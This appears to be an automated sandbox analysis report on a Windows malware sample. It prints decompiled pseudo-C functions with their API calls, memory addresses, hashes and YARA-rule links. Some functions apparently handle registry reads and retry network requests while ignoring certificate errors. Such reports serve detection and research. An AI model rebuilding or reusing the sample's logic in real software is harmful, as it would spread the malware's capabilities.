                                                                                                                                                                                                                                • API String ID: 3214092121-3916222277
                                                                                                                                                                                                                                • Opcode ID: 49f440bbc8d6f70d9b236335bd77e3fb58b22f578c30b52acdc8d150649a38d3
                                                                                                                                                                                                                                • Instruction ID: eb0b9d82446e025f7d4b87895da0c2e3f8b9387bed9c2754c2146a728b8b10d9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49f440bbc8d6f70d9b236335bd77e3fb58b22f578c30b52acdc8d150649a38d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E519031E00908EFCF25EFA9C9896ADBBB6FF45354F14805AEC559B211C7709B11CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D70BB, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			E736D70BB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x736e9a30);
				E736D7870(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E736D71C6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E736D6EB1(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t45 = E736D6490( *((intOrPtr*)(_t47 + 8)), _t42);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E736D6490( *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E736D700B(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E736D71C6( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E736D6EB1(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E736D71C6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x736ef120 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}













                                                                                                                                                                                                                                0x736d70bb
                                                                                                                                                                                                                                0x736d70bb
                                                                                                                                                                                                                                0x736d70bd
                                                                                                                                                                                                                                0x736d70c2
                                                                                                                                                                                                                                0x736d70c7
                                                                                                                                                                                                                                0x736d70cc
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70e1
                                                                                                                                                                                                                                0x736d70e4
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70fd
                                                                                                                                                                                                                                0x736d70ff
                                                                                                                                                                                                                                0x736d7102
                                                                                                                                                                                                                                0x736d7104
                                                                                                                                                                                                                                0x736d71ad
                                                                                                                                                                                                                                0x736d71ad
                                                                                                                                                                                                                                0x736d71b4
                                                                                                                                                                                                                                0x736d71b6
                                                                                                                                                                                                                                0x736d71b9
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d710f
                                                                                                                                                                                                                                0x736d7114
                                                                                                                                                                                                                                0x736d7116
                                                                                                                                                                                                                                0x736d7119
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d712b
                                                                                                                                                                                                                                0x736d712d
                                                                                                                                                                                                                                0x736d7130
                                                                                                                                                                                                                                0x736d7133
                                                                                                                                                                                                                                0x736d7135
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d7139
                                                                                                                                                                                                                                0x736d713e
                                                                                                                                                                                                                                0x736d7143
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d714b
                                                                                                                                                                                                                                0x736d714c
                                                                                                                                                                                                                                0x736d7151
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d715c
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d7165
                                                                                                                                                                                                                                0x736d716f
                                                                                                                                                                                                                                0x736d7171
                                                                                                                                                                                                                                0x736d7174
                                                                                                                                                                                                                                0x736d7176
                                                                                                                                                                                                                                0x736d7182
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3136044242-0
                                                                                                                                                                                                                                • Opcode ID: f69d82640cb2618b1f393baf875ff620fb233056fe885475575e5e21c5e0934b
                                                                                                                                                                                                                                • Instruction ID: 5a2ad8b875ffc1c13fee5f14ed6d5ee3781db45e6ff914c0eecdffea6052697a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f69d82640cb2618b1f393baf875ff620fb233056fe885475575e5e21c5e0934b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A216D72D21625AFEF228E55CD40F6F7F79EB80A90F094629E816562D4D6308D028BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A89EEE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 18%
                                                                                                                                                                                                                                			E00A89EEE(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x7021fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E00A85157(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E00A85157(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E00A853BB(_v20);
					}
					goto L12;
				}
			}












                                                                                                                                                                                                                                0x00a89ef4
                                                                                                                                                                                                                                0x00a89efb
                                                                                                                                                                                                                                0x00a89efe
                                                                                                                                                                                                                                0x00a89f01
                                                                                                                                                                                                                                0x00a89f03
                                                                                                                                                                                                                                0x00a89f08
                                                                                                                                                                                                                                0x00a89feb
                                                                                                                                                                                                                                0x00a89ff1
                                                                                                                                                                                                                                0x00a89ff1
                                                                                                                                                                                                                                0x00a89f12
                                                                                                                                                                                                                                0x00a89f19
                                                                                                                                                                                                                                0x00a89f21
                                                                                                                                                                                                                                0x00a89fe2
                                                                                                                                                                                                                                0x00a89fe8
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a89fe8
                                                                                                                                                                                                                                0x00a89f2a
                                                                                                                                                                                                                                0x00a89f2e
                                                                                                                                                                                                                                0x00a89f2f
                                                                                                                                                                                                                                0x00a89f30
                                                                                                                                                                                                                                0x00a89f36
                                                                                                                                                                                                                                0x00a89f37
                                                                                                                                                                                                                                0x00a89f3c
                                                                                                                                                                                                                                0x00a89f43
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a89f49
                                                                                                                                                                                                                                0x00a89f58
                                                                                                                                                                                                                                0x00a89f5b
                                                                                                                                                                                                                                0x00a89f5e
                                                                                                                                                                                                                                0x00a89f67
                                                                                                                                                                                                                                0x00a89f6c
                                                                                                                                                                                                                                0x00a89f71
                                                                                                                                                                                                                                0x00a89fd9
                                                                                                                                                                                                                                0x00a89f73
                                                                                                                                                                                                                                0x00a89f76
                                                                                                                                                                                                                                0x00a89f7a
                                                                                                                                                                                                                                0x00a89f7b
                                                                                                                                                                                                                                0x00a89f7c
                                                                                                                                                                                                                                0x00a89f7d
                                                                                                                                                                                                                                0x00a89f7f
                                                                                                                                                                                                                                0x00a89f86
                                                                                                                                                                                                                                0x00a89fcc
                                                                                                                                                                                                                                0x00a89f88
                                                                                                                                                                                                                                0x00a89f88
                                                                                                                                                                                                                                0x00a89f93
                                                                                                                                                                                                                                0x00a89fa1
                                                                                                                                                                                                                                0x00a89fa5
                                                                                                                                                                                                                                0x00a89fbd
                                                                                                                                                                                                                                0x00a89fa7
                                                                                                                                                                                                                                0x00a89fb0
                                                                                                                                                                                                                                0x00a89fb8
                                                                                                                                                                                                                                0x00a89fb8
                                                                                                                                                                                                                                0x00a89fa5
                                                                                                                                                                                                                                0x00a89fd2
                                                                                                                                                                                                                                0x00a89fd2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a89f71

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A89FE2
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • wcstombs.NTDLL ref: 00A89FB0
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A89FC6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2631933831-1701360479
                                                                                                                                                                                                                                • Opcode ID: bf31cb36acde943157e70a562f3013fdfb71fe2743dc917c9fd8229c15fdbed3
                                                                                                                                                                                                                                • Instruction ID: 91b6af6bbb7f76f65fbb197826f58e09dff028f604f862ed7ea5ab22ba04126f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf31cb36acde943157e70a562f3013fdfb71fe2743dc917c9fd8229c15fdbed3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8631F5B5900209EFDB14EFA5CD84EAFB7B8EB48344B244969E612E7250D6309E459B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A82932, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A82932(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00A89B32(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xa8d2e0; // 0x105a5a8
				_t4 = _t24 + 0xa8edc8; // 0x1ae9370
				_t5 = _t24 + 0xa8ed70; // 0x4f0053
				_t26 = E00A8779A( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xa8d2e0; // 0x105a5a8
						_t11 = _t32 + 0xa8edbc; // 0x1ae9364
						_t48 = _t11;
						_t12 = _t32 + 0xa8ed70; // 0x4f0053
						_t52 = E00A81FCE(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xa8d2e0; // 0x105a5a8
							_t13 = _t35 + 0xa8ee06; // 0x30314549
							if(E00A82AE3(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0xa8d294 - 6;
								if( *0xa8d294 <= 6) {
									_t42 =  *0xa8d2e0; // 0x105a5a8
									_t15 = _t42 + 0xa8ec12; // 0x52384549
									E00A82AE3(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xa8d2e0; // 0x105a5a8
							_t17 = _t38 + 0xa8ee00; // 0x1ae93a8
							_t18 = _t38 + 0xa8edd8; // 0x680043
							_t45 = E00A89BED(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0xa8d270, 0, _t52);
						}
					}
					HeapFree( *0xa8d270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00A8704F(_t54);
				}
				return _t45;
			}


















                                                                                                                                                                                                                                0x00a82932
                                                                                                                                                                                                                                0x00a82942
                                                                                                                                                                                                                                0x00a82945
                                                                                                                                                                                                                                0x00a8294c
                                                                                                                                                                                                                                0x00a8294e
                                                                                                                                                                                                                                0x00a8294e
                                                                                                                                                                                                                                0x00a82951
                                                                                                                                                                                                                                0x00a82956
                                                                                                                                                                                                                                0x00a8295d
                                                                                                                                                                                                                                0x00a8296a
                                                                                                                                                                                                                                0x00a8296f
                                                                                                                                                                                                                                0x00a82973
                                                                                                                                                                                                                                0x00a82981
                                                                                                                                                                                                                                0x00a8298f
                                                                                                                                                                                                                                0x00a82993
                                                                                                                                                                                                                                0x00a82a24
                                                                                                                                                                                                                                0x00a82a24
                                                                                                                                                                                                                                0x00a82999
                                                                                                                                                                                                                                0x00a82999
                                                                                                                                                                                                                                0x00a8299e
                                                                                                                                                                                                                                0x00a8299e
                                                                                                                                                                                                                                0x00a829a5
                                                                                                                                                                                                                                0x00a829b1
                                                                                                                                                                                                                                0x00a829b3
                                                                                                                                                                                                                                0x00a829b5
                                                                                                                                                                                                                                0x00a829b7
                                                                                                                                                                                                                                0x00a829be
                                                                                                                                                                                                                                0x00a829d0
                                                                                                                                                                                                                                0x00a829d2
                                                                                                                                                                                                                                0x00a829d9
                                                                                                                                                                                                                                0x00a829db
                                                                                                                                                                                                                                0x00a829e2
                                                                                                                                                                                                                                0x00a829ed
                                                                                                                                                                                                                                0x00a829ed
                                                                                                                                                                                                                                0x00a829d9
                                                                                                                                                                                                                                0x00a829f2
                                                                                                                                                                                                                                0x00a829f7
                                                                                                                                                                                                                                0x00a829fe
                                                                                                                                                                                                                                0x00a82a1c
                                                                                                                                                                                                                                0x00a82a1e
                                                                                                                                                                                                                                0x00a82a1e
                                                                                                                                                                                                                                0x00a829b5
                                                                                                                                                                                                                                0x00a82a30
                                                                                                                                                                                                                                0x00a82a30
                                                                                                                                                                                                                                0x00a82a32
                                                                                                                                                                                                                                0x00a82a37
                                                                                                                                                                                                                                0x00a82a39
                                                                                                                                                                                                                                0x00a82a39
                                                                                                                                                                                                                                0x00a82a44

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01AE9370,00000000,?,747DF710,00000000,747DF730), ref: 00A82981
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,01AE93A8,?,00000000,30314549,00000014,004F0053,01AE9364), ref: 00A82A1E
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A8A080), ref: 00A82A30
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: 83cf5bb518061a494a39aeecb67f1d1498d085f3cd01cf002803bf12f407a0ea
                                                                                                                                                                                                                                • Instruction ID: 29ff366adb52866789a54a77883e86ac0e2d08bcb2b104fe7dd1064ecf8bc19b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83cf5bb518061a494a39aeecb67f1d1498d085f3cd01cf002803bf12f407a0ea
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39316D75A00118FFEB21EBE4DE89EBA7BBCFF44750F1400A6B540971A1E670AE06DB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A84A6A, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(80000002), ref: 00A84AC7
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00A848F5), ref: 00A84B0B
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A84B1F
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A84B2D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: c948e24534badcef074accda1de4299da692b6e357749483def35c4347e2b8cd
                                                                                                                                                                                                                                • Instruction ID: b8f053a8e66923e0cd93e60eba82fb509944f05f25194d3fb47cbce440cce521
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c948e24534badcef074accda1de4299da692b6e357749483def35c4347e2b8cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0031FC7290020AEFCB05EFD8D8849AEBBB9FF48350B20842EF5059B251D770DA41CF65
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A85341, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                                                			E00A85341(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E00A85157(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0xa8c2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                                                                                                                                                                                                                0x00a85345
                                                                                                                                                                                                                                0x00a85352
                                                                                                                                                                                                                                0x00a85354
                                                                                                                                                                                                                                0x00a85355
                                                                                                                                                                                                                                0x00a8535d
                                                                                                                                                                                                                                0x00a8535d
                                                                                                                                                                                                                                0x00a85361
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85358
                                                                                                                                                                                                                                0x00a85359
                                                                                                                                                                                                                                0x00a8535c
                                                                                                                                                                                                                                0x00a8535c
                                                                                                                                                                                                                                0x00a85369
                                                                                                                                                                                                                                0x00a8536e
                                                                                                                                                                                                                                0x00a85373
                                                                                                                                                                                                                                0x00a8537b
                                                                                                                                                                                                                                0x00a85381
                                                                                                                                                                                                                                0x00a85383
                                                                                                                                                                                                                                0x00a85386
                                                                                                                                                                                                                                0x00a8538a
                                                                                                                                                                                                                                0x00a8538c
                                                                                                                                                                                                                                0x00a8538f
                                                                                                                                                                                                                                0x00a8538f
                                                                                                                                                                                                                                0x00a85390
                                                                                                                                                                                                                                0x00a85392
                                                                                                                                                                                                                                0x00a8538f
                                                                                                                                                                                                                                0x00a8539c
                                                                                                                                                                                                                                0x00a8539f
                                                                                                                                                                                                                                0x00a853a2
                                                                                                                                                                                                                                0x00a853a3
                                                                                                                                                                                                                                0x00a853a5
                                                                                                                                                                                                                                0x00a853ac
                                                                                                                                                                                                                                0x00a853ac
                                                                                                                                                                                                                                0x00a853b8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,00000000,01AE95AC,00A85884,?,00A8461A,?,01AE95AC,?,00A85884), ref: 00A8535D
                                                                                                                                                                                                                                • StrTrimA.KERNELBASE(?,00A8C2A4,00000002,?,00A8461A,?,01AE95AC,?,00A85884), ref: 00A8537B
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,?,00A8461A,?,01AE95AC,?,00A85884), ref: 00A85386
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Trim
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3043112668-0
                                                                                                                                                                                                                                • Opcode ID: 44e8f21e758417cb1d1c139b0332f00bc6eeb97cdc7b375e7d91c133eafdb936
                                                                                                                                                                                                                                • Instruction ID: 2db7e31220d986d4faf9cacd6fc036d913e047226e8f81912214ff8c49f4bf24
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44e8f21e758417cb1d1c139b0332f00bc6eeb97cdc7b375e7d91c133eafdb936
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB01BC71B007466EE714AB7A8C69F6B7B9DEF85380F141011BE55CF282DAB0CC028760
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A85B8B, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                			E00A85B8B(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x7021e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                                                                                                                                                                                                                0x00a85b92
                                                                                                                                                                                                                                0x00a85b9f
                                                                                                                                                                                                                                0x00a85ba1
                                                                                                                                                                                                                                0x00a85ba4
                                                                                                                                                                                                                                0x00a85be9
                                                                                                                                                                                                                                0x00a85bf1
                                                                                                                                                                                                                                0x00a85bf7
